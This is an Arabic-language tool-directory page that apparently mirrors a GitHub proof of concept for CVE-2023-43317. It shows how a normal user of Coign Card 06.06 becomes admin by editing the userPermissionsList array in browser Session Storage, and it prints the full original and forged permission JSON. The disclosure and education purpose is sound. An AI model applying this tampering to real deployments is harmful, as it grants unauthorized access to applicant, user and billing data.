Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-43317 — تصعيد الامتيازات الرأسية عبر تخزين الجلسة بواسطة أمجد علي (CVE-2023-43317) | Kitploit
أدوات/GitHubGitHub/amjadali-110/cve-2023-43317
المصادقة والترخيصتصعيد الامتيازاتتحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubamjadali-110/cve-2023-43317

CVE-2023-43317

تصعيد الامتيازات الرأسية عبر تخزين الجلسة بواسطة أمجد علي (CVE-2023-43317)

عرض المستودع
3منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-43317

يمكن لمستخدم عادي رفع صلاحياته عبر معامل userPermissionsLIst في مكون Session Storage، للحصول على وصول غير مصرح به إلى الموارد والميزات الإدارية. قد يؤدي ذلك إلى وصول غير مصرح به للبيانات، وتعديل البيانات، وإجراءات أخرى تقتصر عادةً على المسؤولين.

  • المنتج المعرض للخطر:- Coign Card
  • الإصدار المعرض للخطر:- 06.06
  • المراجع:- https://nvd.nist.gov/vuln/detail/CVE-2023-43317

خطوات إعادة الإنتاج

  1. قم بتسجيل الدخول باستخدام حساب مستخدم عادي.
  2. انقر بزر الماوس الأيمن على صفحة الويب واختر "Inspect Element" لفتح أدوات المطور.
  3. في أدوات المطور، انتقل إلى علامة التبويب "Application".
  4. قم بتوسيع قسم "Session Storage".
  5. في Session Storage، يمكنك رؤية كائن "userPermissionsList" الذي يحتوي على مصفوفة JSON من صلاحيات المستخدم. الصلاحيات الأولية للمستخدم العادي تبدو هكذا:
root@kitploit:~
[{"permissionId":1,"permissionName":"CanGetApplicants"},{"permissionId":5,"permissionName":"CanGetUsers"},{"permissionId":8,"permissionName":"CanGetApplications"},{"permissionId":9,"permissionName":"CanResendEmails"},{"permissionId":18,"permissionName":"CanGetCustomers"},{"permissionId":22,"permissionName":"CanGetUserActivity"}]
  1. قم بتعديل الصلاحيات في Session Storage للحصول على وصول على مستوى المسؤول:
root@kitploit:~
[{"permissionId":1,"permissionName":"CanGetApplicants"},{"permissionId":2,"permissionName":"CanCreateApplicants"},{"permissionId":3,"permissionName":"CanUpdateApplicants"},{"permissionId":4,"permissionName":"CanManageAccounts"},{"permissionId":5,"permissionName":"CanGetUsers"},{"permissionId":6,"permissionName":"CanCreateUsers"},{"permissionId":7,"permissionName":"CanUpdateUsers"},{"permissionId":8,"permissionName":"CanGetApplications"},{"permissionId":9,"permissionName":"CanResendEmails"},{"permissionId":10,"permissionName":"CanGetDocuments"},{"permissionId":11,"permissionName":"CanUploadDocuments"},{"permissionId":12,"permissionName":"CanCreateIndividualInvitations"},{"permissionId":14,"permissionName":"CanQueryIndividualInvitations"},{"permissionId":15,"permissionName":"CanGetBulkInvitations"},{"permissionId":16,"permissionName":"CanUploadBulkInvitationsFile"},{"permissionId":17,"permissionName":"CanUpdateFormStatus"},{"permissionId":18,"permissionName":"CanGetCustomers"},{"permissionId":19,"permissionName":"CanResendInvitations"},{"permissionId":20,"permissionName":"CanResendEvaluations"},{"permissionId":21,"permissionName":"CanResendManualReviews"},{"permissionId":22,"permissionName":"CanGetUserActivity"},{"permissionId":23,"permissionName":"CanGetDeliveredDocuments"},{"permissionId":24,"permissionName":"CanGetBillingTables"},{"permissionId":25,"permissionName":"CanGetBillingTableHistoricalRecords"},{"permissionId":26,"permissionName":"CanGetBillingTableDraftUpdateRecords"},{"permissionId":27,"permissionName":"CanGetFeedBacks"},{"permissionId":28,"permissionName":"CanUpdateBillingTables"},{"permissionId":29,"permissionName":"CanUpdateUserEmail"},{"permissionId":30,"permissionName":"CanGetTemplates"},{"permissionId":31,"permissionName":"CanResendApplicationEmail"},{"permissionId":32,"permissionName":"CanDeleteUpcomingUpdates"},{"permissionId":33,"permissionName":"CanCreatePolls"},{"permissionId":34,"permissionName":"CanGetPolls"},{"permissionId":35,"permissionName":"CanUpdatePolls"},{"permissionId":36,"permissionName":"CanNotifyIndividualinvitations"},{"permissionId":37,"permissionName":"CanSendInvitationEmail"}]
  1. بعد تعديل الصلاحيات، قم بتحديث الصفحة.
  2. ستحصل على وصول غير مصرح به إلى الموارد والميزات الإدارية.

مقالة

https://amjadali110.medium.com/a-easy-vertical-privilege-escalation-via-session-storage-cfa9f558c94

تنزيل الأداة